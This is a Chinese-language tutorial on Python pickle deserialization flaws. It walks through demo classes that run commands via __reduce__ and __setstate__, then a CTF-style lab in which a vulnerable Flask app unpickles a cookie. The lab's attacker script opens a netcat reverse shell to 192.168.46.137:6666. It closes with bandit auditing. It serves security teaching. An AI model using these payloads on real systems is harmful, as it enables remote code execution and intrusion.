python 反序列化

Python-反序列化函数使用

pickle.dump(obj, file) : 将对象序列化后保存到文件

pickle.load(file) : 读取文件， 将文件中的序列化内容反序列化为对象

pickle.dumps(obj) : 将对象序列化成字符串格式的字节流

pickle.loads(bytes_obj) : 将字符串格式的字节流反序列化为对象

魔术方法：

reduce() 反序列化时调用

reduce_ex() 反序列化时调用

setstate() 反序列化时调用

getstate() 序列化时调用

各类语言函数：

Java： Serializable Externalizable接口、fastjson、jackson、gson、ObjectInputStream.read、ObjectObjectInputStream.readUnshared、XMLDecoder.read、ObjectYaml.loadXStream.fromXML、ObjectMapper.readValue、JSON.parseObject等

PHP： serialize()、 unserialize()

Python：pickle marshal PyYAML shelve PIL unzip

案例一：

import pickle

import os

\#反序列化魔术方法调用-__reduce__() __reduce_ex__() __setstate__()

class A(object):

​ def __reduce__(self):

​ print('反序列化调用')

​ return (os.system,('calc',))

a = A()

p_a = pickle.dumps(a)

pickle.loads(p_a)

print('==========')

print(p_a)

案例二：

class SerializePerson():

​ def __init__(self, name):

​ self.name = name

​ \# 构造 __setstate__ 方法

​ def __setstate__(self, name):

​ os.system('calc') # 恶意代码

tmp = pickle.dumps(SerializePerson('tom')) #序列化

pickle.loads(tmp) # 反序列化 此时会弹出计算器

Python-反序列化POP链构造

#CTF-反序列化漏洞利用-构造&RCE

环境介绍：利用Python-flask搭建的web应用，获取当前用户的信息，进行展示，在获取用户的信息时，通过对用户数据进行反序列化获取导致的安全漏洞！

-Server服务器：

import pickle

import base64

from flask import Flask, request

app = Flask(__name__)

@app.route("/")

def index():

​ try:

​ user = base64.b64decode(request.cookies.get('user'))

​ user = pickle.loads(user)

​ username = user["username"]

​ except:

​ username = "Guest"

​ return "Hello %s" % username

if __name__ == "__main__":

​ app.run(

​ host='192.168.1.3',

​ port=5000,

​ debug=True

​ )

服务器开启一个web服务

-Hacker服务器：

import requests

import pickle

import os

import base64

class exp(object):

​ def __reduce__(self):

​ s='c:/nc.exe -e cmd 192.168.46.137 6666'

​ return (os.system, (s,))

e = exp()

s = pickle.dumps(e)

print(s)

response = requests.get("http://192.168.1.3:5000/", cookies=dict(

​ user=base64.b64encode(s).decode()

))

print(response.content)

开启监听

攻击者执行反弹shell

Python-自动化审计bandit使用

参考：https://bandit.readthedocs.io/

安装：pip install bandit

linux:

安装后会在当前Python目录下bin

使用：bandit -r 需要审计的源码目录

windows:

安装后会在当前Python目录下script

使用：bandit -r 需要审计的源码目录